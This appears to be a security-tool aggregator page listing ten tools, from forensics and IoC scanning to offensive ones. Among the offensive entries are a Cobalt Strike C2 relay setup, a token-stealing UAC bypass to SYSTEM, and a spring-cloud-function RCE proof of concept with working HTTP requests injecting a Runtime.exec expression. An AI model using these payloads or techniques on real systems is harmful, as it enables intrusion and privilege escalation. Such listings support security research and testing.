FormatFuzzer : A Framework For High-Efficiency, High-Quality Generation And Parsing Of Binary Inputs
FormatFuzzer is a framework for high-efficiency, high-quality generation and parsing of binary inputs. It takes a binary template that describes the format of a binary input and generates an executable that produces and parses the given binary format. From a binary template for GIF, for instance, FormatFuzzer produces a GIF generator - also known as GIF fuzzer. Generators produced by FormatFuzzer are highly efficient, producing thousands of valid test inputs per second...
Live-Forensicator : Powershell Script To Aid Incidence Response And Live Forensics
.png "Live-Forensicator : Powershell Script To Aid Incidence Response And Live Forensics")
Live Forensicator is part of the Black Widow Toolbox, its aim is to assist Forensic Investigators and Incidence responders in carrying out a quick live forensic investigation. It achieves this by gathering different system information for further review for anomalous behaviour or unexpected data entry, it also looks out for unusual files or activities and points it out to the...
Phantun : Transforms UDP Stream Into (Fake) TCP Streams That Can Go Through Layer 3 &Amp
.png "Phantun : Transforms UDP Stream Into (Fake) TCP Streams That Can Go Through Layer 3 &Amp")
Phantun is a project that obfuscated UDP packets into TCP connections. It aims to achieve maximum performance with minimum processing and encapsulation overhead. It is commonly used in environments where UDP is blocked/throttled but TCP is allowed through. Phantun simply converts a stream of UDP packets into obfuscated TCP stream packets. The TCP stack used by Phantun is designed to pass...
CobaltBus : Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus
.png "CobaltBus : Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus")
CobaltBus is a Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus Setup Create an Azure Service BusCreate a Shared access policy (Connection string) that can only Send and ListenEdit the static connectionString variable in Beacon C# projects to match the "Primary Connection String" value for the Shared access policy created in step 2.The same variables need...
Odin : Central IoC Scanner Based On Loki
.png "Odin : Central IoC Scanner Based On Loki")
Odin is a central IoC scanner based on Loki. General Info This application Loki latest version and download it on all machines using a powershell script and run it then this app receives the respose from all machines and parse the feed in CSV form. Requirements Python +3.5PyQT5psutilpyparsingzipfile Fetch Odin download and extract the latest version on Loki and start HTTP server to deliver the...
Auto-Elevate : Escalate From A Low-Integrity Administrator Account To NT AUTHORITYSYSTEM
.png "Auto-Elevate : Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM")
Auto-Elevate tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates it's process TOKEN, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method #41 (ICMLuaUtil UAC bypass) from hfiref0x's UACME utility, this utility can auto-elevate a low privileged Administrative account to NT AUTHORITYSYSTEM. The following...
Subdomains.Sh : A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain
.png "Subdomains.Sh : A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain")
Subdomains.Sh is a wrapper around tools used for subdomain enumeration, to automate the workflow, on a given domain, written in bash. The Workflow Installation Run the installation script: curl -s https://raw.githubusercontent.com/enenumxela/subdomains.sh/main/install.sh | bash - Or run in an ephemeral Docker container: Clone the repository and run cd subdomains.shBuild the container image./docker-subdomains.sh buildAfter build, you can run the script with the same options listed above.Each run will...
Slyther : AWS Security Tool
Slyther is AWS Security tool to check read/write/delete access for S3 buckets. Requirements aws-cli Installation pip3 install -r requirements.txt Usage example python3 slyther.py -b flaws.cloud Download
Spring-Spel-0Day-Poc : Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression
Spring-Spel-0Day-Poc is spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar get path lists for test find . -name "*.java"|xargs -I % cat %|grep -Eo '"({8,})"'|sort -u|sed 's/"//g' …functionRouteruppercaselowercase… poc1 POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")Content-Length: 5 poc2 POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15...
Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries
.png "Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries")
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simple filtering rules, it's very difficult to precisely target Cloak with...
